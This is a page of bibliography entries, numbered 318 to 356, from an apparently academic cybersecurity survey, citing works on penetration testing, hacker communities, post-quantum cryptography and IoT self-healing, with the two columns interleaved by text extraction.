2009, pp. 1–7. [342] Michael Fagan, Michael Fagan, Katerina N. Megas, Karen Scarfone,
[318] Aakash Trivedi, A comprehensive online tool [wr-3] that detects security flaws in Matthew Smith, Foundational Cybersecurity Activities for IoT Device
networks, in: Computer Science and Information Technology (ICCSIT), 2010 3rd Manufacturers, US Department of Commerce, National Institute of Standards and
IEEE International Conference on, vol. 2, IEEE, 2010, pp. 316–320. Technology, 2020.
[319] Yong Lu, Xin Luo, Michael Polgar, Yuanyuan Cao, Social network analysis of a [343] Kenneth Einar Himma, Ethical Issues Involving Computer Security: Hacking,
criminal hacker community, J. Comput. Inf. Syst. 51 (2) (2010) 31–41. Hacktivism, and Counterhacking, The handbook of information and computer
[320] Yangbin Zhou, Keyu Jiang, An analysis system for computer forensic education, ethics, 2008, p. 191.
training, and awareness, in: Computing, Measurement, Control and Sensor [344] Ross Brewer, Cyber threats: reducing the time to detection and response, Netw.
Network (CMCSN), 2012 International Conference on, IEEE, 2012, pp. 48–51. Secur. 2015 (5) (2015) 5–8.
[321] Ammar Alazab, Jemal Abawajy, Michael Hobbs, Robert Layton, Ansam Khraisat, [345] Eman Salim Ibrahim Harba, Secure data encryption through a combination of aes,
Crime toolkits: the productisation of cybercrime, in: 2013 12th IEEE International rsa and hmac, Eng. Technol. Appl. Sci. Res. 7 (4) (2017) 1781–1785.
Conference on Trust, Security and Privacy in Computing and Communications, [346] Gorjan Alagic, Gorjan Alagic, Jacob Alperin-Sheriff, Daniel Apon, David Cooper,
IEEE, 2013, pp. 1626–1632. Quynh Dang, Yi-Kai Liu, Carl Miller, Dustin Moody, Rene Peralta, et al., Status
[322] Abbasi Ahmed, Weifeng Li, Victor Benjamin, Shiyu Hu, Hsinchun Chen, Report on the First Round of the NIST Post-quantum Cryptography
Descriptive analytics: examining expert hackers in web forums, in: Intelligence Standardization Process. US Department of Commerce, National Institute of
and Security Informatics Conference (JISIC), 2014 IEEE Joint, IEEE, 2014, Standards and Technology, 2019.
pp. 56–63. [347] Lily Chen, Lily Chen, Stephen Jordan, Yi-Kai Liu, Dustin Moody, Rene Peralta,
[323] Rigzin Angmo, Monika Sharma, Performance evaluation of web based automation Perlner Ray, Daniel Smith-Tone, Report on Post-quantum Cryptography, US
testing tools, in: Confluence the Next Generation Information Technology Summit Department of Commerce, National Institute of Standards and Technology, 2016.
(Confluence), 2014 5th International Conference, IEEE, 2014, pp. 731–735. [348] Jintai Ding, Rainer Steinwandt, Post-quantum Cryptography: 10th International
[324] S. Sandhya, Sohini Purkayastha, Emil Joshua, Akash Deep, Assessment of website Conference, PQCrypto 2019, Chongqing, China, May 8–10, 2019 Revised Selected
security by penetration testing using wireshark, in: Advanced Computing and Papers, vol. 11505, Springer, 2019.
Communication Systems (ICACCS), 2017 4th International Conference on, IEEE, [349] Jo~ao Pedro Dias, Tiago Boldt Sousa, Andr
e Restivo, Hugo Sereno Ferreira,
2017, pp. 1–4. A pattern-language for self-healing internet-of-things systems, in: Proceedings of
[325] Artem Tetskyi, Vyacheslav Kharchenko, Dmytro Uzun, Neural networks based the European Conference on Pattern Languages of Programs 2020, 2020, pp. 1–17.
choice of tools for penetration testing of web applications, in: 2018 IEEE 9th [350] Ronny Seiger, Stefan Herrmann, Uwe Aßmann, Self-healing for distributed
International Conference on Dependable Systems, Services and Technologies workflows in the internet of things, in: 2017 IEEE International Conference on
(DESSERT), IEEE, 2018. Software Architecture Workshops (ICSAW), IEEE, 2017, pp. 72–79.
[326] Christopher Bailey, Rog
erio de Lemos, Evaluating self-adaptive authorisation [351] Rafael Angarita, Responsible objects: towards self-healing internet of things
infrastructures through gamification, in: 2018 48th Annual IEEE/IFIP applications, in: 2015 IEEE International Conference on Autonomic Computing,
International Conference on Dependable Systems and Networks (DSN), IEEE, IEEE, 2015, pp. 307–312.
2018. [352] Kimberly Graves, CEH Certified Ethical Hacker Study Guide, John Wiley & Sons,
[327] Darrien Rushing, Jason Guidry, Ihssan Alkadi, Collaborative penetration-testing 2010.
and analysis toolkit (cpat), in: Aerospace Conference, 2015 IEEE, IEEE, 2015, [353] M.E. Elhamahmy, Tarek S. Sobh, Preventing information leakage caused by war
pp. 1–9. driving attacks in wi-fi networks, in: International Conference on Aerospace
[328] Vasaka Visoottiviseth, Phuripat Akarasiriwong, Siravitch Chaiyasart, Sciences and Aviation Technology, vol. 14, The Military Technical College, 2011,
Siravit Chotivatunyu, Pentos: penetration testing tool for internet of thing devices, pp. 1–9.
in: Region 10 Conference, TENCON 2017-2017 IEEE, IEEE, 2017, pp. 2279–2284. [354] Vasileios Mavroeidis, Siri Bromander, Cyber threat intelligence model: an
[329] Ning Zhu, Chen Xin-yuan, Yong-fu Zhang, Xin Si-yuan, Design and application of evaluation of taxonomies, sharing standards, and ontologies within cyber threat
penetration attack tree model oriented to attack resistance test, in: Computer intelligence, in: 2017 European Intelligence and Security Informatics Conference
Science and Software Engineering, 2008 International Conference on vol. 3, IEEE, (EISIC), IEEE, 2017, pp. 91–98.
2008, pp. 622–626. [355] Md Sahrom Abu, Siti Rahayu Selamat, Aswami Ariffin, Robiah Yusof, Cyber threat
[330] Norah Ahmed Almubairik, Wills Gary, Automated penetration testing based on a intelligence–issue and challenges, Indon. J. Electr. Eng. Comput. Sci. 10 (1) (2018)
threat model, in: Internet Technology and Secured Transactions (ICITST), 2016 371–379.
11th International Conference for, IEEE, 2016, pp. 413–414. [356] Thomas D. Wagner, Khaled Mahbub, Esther Palomar, Ali E. Abdallah, Cyber threat
[331] Anestis Bechtsoudis, Nicolas Sklavos, Aiming at higher network security through intelligence sharing: survey and research directions, Comput. Secur. 87 (2019),
extensive penetration tests, IEEE latin am. trans. 10 (3) (2012) 1752–1756. 101589.
[332] Jiajia Wang, Research of penetration test based on mobile internet, in: Computer
and Communications (ICCC), 2016 2nd IEEE International Conference on, IEEE,
2016, pp. 2542–2545.

308